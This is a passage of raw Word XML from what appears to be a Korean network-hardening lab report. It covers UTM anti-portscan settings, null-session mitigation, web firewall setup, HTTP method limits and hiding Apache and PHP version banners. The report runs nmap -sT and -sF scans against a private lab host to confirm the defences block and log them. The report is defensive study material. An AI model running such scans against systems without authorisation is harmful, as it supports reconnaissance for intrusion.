        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">나 </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일만 따로 백업 일정을 설정,</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">설정 시간은 사용 빈도가 낮을 것으로 예상되는 오전 </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">시 </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>분</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144CF8" w:rsidRPr="00144CF8" w:rsidRDefault="00144CF8" w:rsidP="00144CF8">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F53793" w:rsidRDefault="00924F61" w:rsidP="00FF1A4D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1A4D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00FF1A4D" w:rsidRPr="00FF1A4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">시스템보안 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1A4D" w:rsidRPr="00C05256" w:rsidRDefault="00FF1A4D" w:rsidP="00FF1A4D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1A4D" w:rsidRDefault="00C05256" w:rsidP="00C05256">
      <w:pPr>
        <w:ind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60000" cy="2091600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"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.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56" w:rsidRPr="00C05256" w:rsidRDefault="00C05256" w:rsidP="00C05256">
      <w:pPr>
        <w:pStyle w:val="af0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inherit" w:eastAsia="굴림체" w:hAnsi="inherit" w:cs="굴림체" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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포트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스캔을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차단하려면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필터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7000 - 7004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및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7016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을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활성화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해야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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="굴림체" w:hAnsi="inherit" w:cs="굴림체" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C05256" w:rsidRPr="00C05256" w:rsidRDefault="00C05256" w:rsidP="00C05256">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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단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소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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주소에서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포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호스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시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횟수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추적하고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소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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주소에서의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연결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시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횟수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임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값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초과하면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활성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됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C05256" w:rsidRPr="00C05256" w:rsidRDefault="00C05256" w:rsidP="00C05256">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>호스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포트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은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격리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기능을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통해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차단됩니다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. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>검색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및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S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>weep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필터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IPS </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>검사를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받는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T</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>raffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:hint="eastAsia"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>연결</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C05256" w:rsidRPr="00C05256" w:rsidRDefault="00C05256">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C05256" w:rsidRDefault="00C052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256" w:rsidRDefault="00C05256">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF1A4D" w:rsidRDefault="00FF1A4D" w:rsidP="00FF1A4D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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rt Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1A4D" w:rsidRDefault="00FF1A4D" w:rsidP="00FF1A4D">
      <w:pPr>
        <w:ind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58998" cy="947651"/>
            <wp:effectExtent l="0" t="0" r="3810" b="508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포트 스캐닝 차단 설정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29" cy="9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4D" w:rsidRDefault="00374C26" w:rsidP="00FF1A4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Port S</w:t>
      </w:r>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>canning</w:t>
      </w:r>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">방어를 위해 </w:t>
      </w:r>
      <w:r w:rsidR="00FF1A4D" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UTM</w:t>
      </w:r>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-Portscan </w:t>
      </w:r>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 켬 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6604" cy="1088968"/>
            <wp:effectExtent l="0" t="0" r="635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nmap -sT 192.168.52.234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9" cy="10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310400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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로그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Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">툴의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">–sT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">옵션을 사용해서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Port Scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 했을 때 모든 포트를 찾지 못하는 것을 볼 수 있음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공격한 내용을 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UTM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서 로그로 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5E68" w:rsidRDefault="00EC5E68" w:rsidP="00EC5E68">
      <w:pPr>
        <w:ind w:left="80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60000" cy="1155600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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nmp-sF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860" cy="1404851"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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nmap -sF 로그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56" cy="1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8" w:rsidRDefault="00EC5E68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lastRenderedPageBreak/>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 다른 옵션인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>–sF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 사용해봐도 포트를 찾지 못함,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> UTM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서 로그로 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5E68" w:rsidRDefault="00EC5E68" w:rsidP="00EC5E68">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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Null Session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5E68" w:rsidRDefault="00EC5E68" w:rsidP="00EC5E68">
      <w:pPr>
        <w:ind w:left="8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9582" cy="1330036"/>
            <wp:effectExtent l="0" t="0" r="3175" b="381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null session 대응방법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84" cy="13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943" cy="2377440"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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nullsession 체크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40" cy="23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958621" cy="2585258"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715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nullsession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82" cy="26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FE" w:rsidRDefault="00C52CFE" w:rsidP="00EC5E68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M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>icro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oft </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">페이지에서 확인했을 때 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>사용 권한을 익명 사용자에게 적용을 사용 안 함으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명명된 파이프와 공유에 대한 익명 액세스 제한 속성을 사용으로 설정하면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Null Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 탈취당하지 않을 수 있음 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53793" w:rsidRDefault="00F537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7A9" w:rsidRDefault="009167A9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9167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>웹 보안</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502E0B" w:rsidRDefault="00502E0B" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0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보안 장비 설정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TM)</w:t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웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">해킹의 경우 웹 방화벽을 설정해서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UTM</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 거쳐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502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이 이동하도록 설정하면 대부분의 공격을 방지할 수 있음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E4B9D12" wp14:editId="35D5B9DE">
            <wp:extent cx="4131310" cy="1770611"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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015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90" cy="17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B95507" wp14:editId="19FF9F00">
            <wp:extent cx="4114543" cy="1637608"/>
            <wp:effectExtent l="0" t="0" r="635" b="127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-016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4" cy="1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Real </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버 설정</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>웹 방화벽으로 웹 서비스를 요청하면 실제로 서비스를 제공할 서버 정보를 등록</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068217C" w:rsidRDefault="0068217C" w:rsidP="0068217C">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr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418BCA16" wp14:editId="2AD47E51">
            <wp:extent cx="4919642" cy="3258589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17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93" cy="32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258103" wp14:editId="2DD30EBB">
            <wp:extent cx="4920615" cy="3840480"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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-018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9" cy="3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가상 서버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웹 방화벽을 적용하여 보안에 사용할 가상의 서버를 설정,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 xml:space="preserve">방화벽 프로파일은 미리 작성되어 잇는 </w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Advanced Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068217C" w:rsidRDefault="006821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67A9" w:rsidRDefault="00144CF8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144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UT, DELETE </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>제한</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144CF8" w:rsidRDefault="00144CF8" w:rsidP="00144CF8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4FFAC0B" wp14:editId="6F77F730">
            <wp:extent cx="4256117" cy="120523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 아파치 method 설정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41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68217C" w:rsidRDefault="00144CF8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144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">현재는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버 파일에 의해서 제한이 되어 있는 듯 하지만,</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/httpd/conf/httpd.conf </w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일을 통해서도 h</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ttp Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 접근 제한이 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F61">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144CF8" w:rsidRPr="00C67042" w:rsidRDefault="00C67042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anner Grabbing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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아파치 버전 정보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390CEA2D" wp14:editId="3F808DD3">
            <wp:extent cx="4297680" cy="647640"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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010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76" cy="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860D15" wp14:editId="4EB0B000">
            <wp:extent cx="2724126" cy="998436"/>
            <wp:effectExtent l="0" t="0" r="63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11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54" cy="10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F72F08" wp14:editId="16D41FF9">
            <wp:extent cx="4048299" cy="1543050"/>
            <wp:effectExtent l="0" t="0" r="952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012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67" cy="15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7102F1" wp14:editId="6F8A98BC">
            <wp:extent cx="4064924" cy="256531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013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94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Pr="00924F61" w:rsidRDefault="00C67042" w:rsidP="00924F61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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/httpd/conf/httpd.conf </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">파일에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042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C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 옵션을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prod</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로 설정 후 확인해보면 아파치 버전 정보가 숨겨진 것을 확인할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C67042" w:rsidRPr="00C67042" w:rsidRDefault="00C67042" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버전 숨기기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6B8E8D8" wp14:editId="0EC98961">
            <wp:extent cx="3811487" cy="922713"/>
            <wp:effectExtent l="0" t="0" r="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14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54" cy="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1FC9C9" wp14:editId="6B8D1665">
            <wp:extent cx="3792848" cy="1271848"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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15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82" cy="12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2" w:rsidRPr="00C67042" w:rsidRDefault="00C67042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C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">etc/php.ini </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">파일에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">expose_php </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">값을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Off</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 설정 후 확인하면 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">php </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전 정보가 보이지 않는 것을 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C67042" w:rsidRPr="00AC03BE" w:rsidRDefault="00C67042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C03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00AC03BE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">irectory </w:t>
      </w:r>
      <w:r w:rsidR="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
